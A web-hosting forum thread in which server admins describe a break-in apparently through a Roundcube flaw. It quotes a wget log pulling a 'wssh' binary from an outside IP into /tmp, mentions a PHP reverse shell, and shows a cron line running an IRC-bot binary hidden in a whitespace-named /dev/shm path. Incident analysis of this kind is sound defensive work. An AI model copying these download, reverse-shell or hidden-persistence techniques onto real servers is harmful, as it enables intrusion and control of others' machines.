Just hacked with WSSH

FishStick

FishStick

Verified User
Joined
Jul 23, 2008
Messages
21
Hi there,

When I got in to the office this morning apache was running but not responding. I had to kill it and start it. Then I looked trough the error logs and found out that someone or something was trying to downloaded wcube and wssh to my server, and had infact downloaded wssh:

--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... wssh: no process killed
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,569,280 [text/plain]

0K .......... .......... .......... .......... .......... 1% 659.52 KB/s
50K .......... .......... .......... .......... .......... 2% 2.57 MB/s
100K .......... .......... .......... .......... .......... 4% 2.44 MB/s
150K .......... .......... .......... .......... .......... 5% 2.96 MB/s
200K .......... .......... .......... .......... .......... 7% 2.96 MB/s
250K .......... .......... .......... .......... .......... 8% 4.44 MB/s
300K .......... .......... .......... .......... .......... 10% 4.66 MB/s
350K .......... .......... .......... .......... .......... 11% 2.87 MB/s
400K .......... .......... .......... .......... .......... 12% 4.65 MB/s
450K .......... .......... .......... .......... .......... 14% 4.67 MB/s
500K .......... .......... .......... .......... .......... 15% 2.44 MB/s
550K .......... .......... .......... .......... .......... 17% 5.43 MB/s
600K .......... .......... .......... .......... .......... 18% 2.96 MB/s
650K .......... .......... .......... .......... .......... 20% 3.37 MB/s
700K .......... .......... .......... .......... .......... 21% 2.96 MB/s
750K .......... .......... .......... .......... .......... 22% 5.15 MB/s
800K .......... .......... .......... .......... .......... 24% 4.25 MB/s
850K .......... .......... .......... .......... .......... 25% 2.96 MB/s
900K .......... .......... .......... .......... .......... 27% 3.62 MB/s
950K .......... .......... .......... .......... .......... 28% 2.64 MB/s
1000K .......... .......... .......... .......... .......... 30% 4.65 MB/s
1050K .......... .......... .......... .......... .......... 31% 2.88 MB/s
1100K .......... .......... .......... .......... .......... 32% 4.88 MB/s
1150K .......... .......... .......... .......... .......... 34% 3.61 MB/s
1200K .......... .......... .......... .......... .......... 35% 2.88 MB/s
1250K .......... .......... .......... .......... .......... 37% 4.65 MB/s
1300K .......... .......... .......... .......... .......... 38% 3.05 MB/s
1350K .......... .......... .......... .......... .......... 40% 3.76 MB/s
1400K .......... .......... .......... .......... .......... 41% 4.89 MB/s
1450K .......... .......... .......... .......... .......... 43% 3.05 MB/s
1500K .......... .......... .......... .......... .......... 44% 2.88 MB/s
1550K .......... .......... .......... .......... .......... 45% 2.96 MB/s
1600K .......... .......... .......... .......... .......... 47% 5.74 MB/s
1650K .......... .......... .......... .......... .......... 48% 2.96 MB/s
1700K .......... .......... .......... .......... .......... 50% 3.06 MB/s
1750K .......... .......... .......... .......... .......... 51% 9.78 MB/s
1800K .......... .......... .......... .......... .......... 53% 2.27 MB/s
1850K .......... .......... .......... .......... .......... 54% 2.51 MB/s
1900K .......... .......... .......... .......... .......... 55% 2.96 MB/s
1950K .......... .......... .......... .......... .......... 57% 9.77 MB/s
2000K .......... .......... .......... .......... .......... 58% 2.57 MB/s
2050K .......... .......... .......... .......... .......... 60% 3.49 MB/s
2100K .......... .......... .......... .......... .......... 61% 3.05 MB/s
2150K .......... .......... .......... .......... .......... 63% 6.50 MB/s
2200K .......... .......... .......... .......... .......... 64% 3.06 MB/s
2250K .......... .......... .......... .......... .......... 65% 2.96 MB/s
2300K .......... .......... .......... .......... .......... 67% 8.17 MB/s
2350K .......... .......... .......... .......... .......... 68% 2.87 MB/s
2400K .......... .......... .......... .......... .......... 70% 2.87 MB/s
2450K .......... .......... .......... .......... .......... 71% 4.66 MB/s
2500K .......... .......... .......... .......... .......... 73% 2.87 MB/s
2550K .......... .......... .......... .......... .......... 74% 2.96 MB/s
2600K .......... .......... .......... .......... .......... 76% 2.27 MB/s
2650K .......... .......... .......... .......... .......... 77% 9.76 MB/s
2700K .......... .......... .......... .......... .......... 78% 3.15 MB/s
2750K .......... .......... .......... .......... .......... 80% 2.51 MB/s
2800K .......... .......... .......... .......... .......... 81% 9.87 MB/s
2850K .......... .......... .......... .......... .......... 83% 2.50 MB/s
2900K .......... .......... .......... .......... .......... 84% 2.88 MB/s
2950K .......... .......... .......... .......... .......... 86% 10.87 MB/s
3000K .......... .......... .......... .......... .......... 87% 2.96 MB/s
3050K .......... .......... .......... .......... .......... 88% 2.79 MB/s
3100K .......... .......... .......... .......... .......... 90% 2.51 MB/s
3150K .......... .......... .......... .......... .......... 91% 8.12 MB/s
3200K .......... .......... .......... .......... .......... 93% 2.33 MB/s
3250K .......... .......... .......... .......... .......... 94% 3.36 MB/s
3300K .......... .......... .......... .......... .......... 96% 6.99 MB/s
3350K .......... .......... .......... .......... .......... 97% 1.99 MB/s
3400K .......... .......... .......... .......... .......... 98% 3.91 MB/s
3450K .......... .......... .......... ..... 100% 3.33 MB/s

05:18:40 (3.22 MB/s) - `wssh' saved [3569280/3569280]
Click to expand...

I found wssh in /tmp and deleted it.

Now, I've been googeling about wssh, and read up here. From what I understand there have been several critical sploits in Roundcube since its dawn. Is the default DA still installed with know unsecure apps and utils out of the box?

What damage can wssh do, what is its intention?

Thanks.

Edit: Just found cback and back.txt in /tmp too so the intruder was running his own shell on my server.

Edit 2: Anything else I must do (I can't run the server in PHP safe mode as I have some PHP scripts running different apps at the server)? So far I've:

1. Deleted wssh in /tmp
2. Deleted wcube in /tmp
3. Temporarily renamed moved the PHP Shell script (back.txt) to another path (as I'm going to block the source IP/attacker's IP stored in the file). Script will be deleted later.
4. Chmodded wget to 700
5. About to secure /tmp
6. Send abuse mail to intruder's ISP
7. Yeah and of course deleted roundcube
 
Last edited:
Yes we all know how to do a ripe search. But against what ip address? That is what I am asking. How did you figure out the attacker's ip address?

--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... wssh: no process killed
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Click to expand...

This is the ip of where wssh was downloaded from NOT the attacker. Its good to notify the host too which apparently you did.

So again how did you figure out the attacker's isp?
 
floyd said:
This is the ip of where wssh was downloaded from NOT the attacker. Its good to notify the host too which apparently you did.

So again how did you figure out the attacker's isp?
Click to expand...
I'm completely aware that's not the intruder's IP (...) so I didn't waste my time making any reports to that host. Eventhough that server clearly is compromised, it's passive in my logs. Actually my server is the active one connecting to his, so if anyone should get the abuse report in that isolated case it would be me or my ISP.

The intruder's IP is at line 49 in the PHP shell script.
 
Last edited:
I just reread your post. Probably after you edited it and see it now.

Apparently back.txt is for this specific attack. I was looking for a more general answer to help investigate all such attacks.
 
Last edited:
In my case, and may others I've came across, the recent discovered roundcube exploit has been used to upload (download acutally) a PHP based reverse shell.

The script is stored in /tmp along with wcube and/or wssh, in my case both. I've seen different file names on this reverse shell script, though it apears to be the same; http://pentestmonkey.net/tools/php-reverse-shell/

It creates a backdoor at the server to the intruder, which in my case turn out to be a rooted ns at keyweb.de.
 
Last edited:
Ditto....

In the php reverse shell script, you can find the IP address and port of the IRC server that it was trying to connect to. I've also got the 'wssh' file in my /tmp as well.

Would mod_security of stopped the remote download? I've went ahead and installed it too.
 
Is secure_php a script comes with DA, if not where can I find more info on it? Does mod_security accomplish the same thing as 'secure_php'?
 
Painless, thanks.

BTW, also found some irc bot config info, or something to do with it's configuration and or C&C hidden in

Code: 
/dev/shm/.              /.-/.              /.-/.ICE-unix/

And a cron job running with apache being it's owner:

Code: 
/USR/SBIN/CRON[4597]: (apache) CMD (/dev/shm/.              /.-/.              /.-/.ICE-unix/update >/dev/null 2>&1)

'apache' is listed in cron.deny, shouldn't that of been enough to prevent cron from running a cronjob owned by apache?
 
You must log in or register to reply here.
Back
Top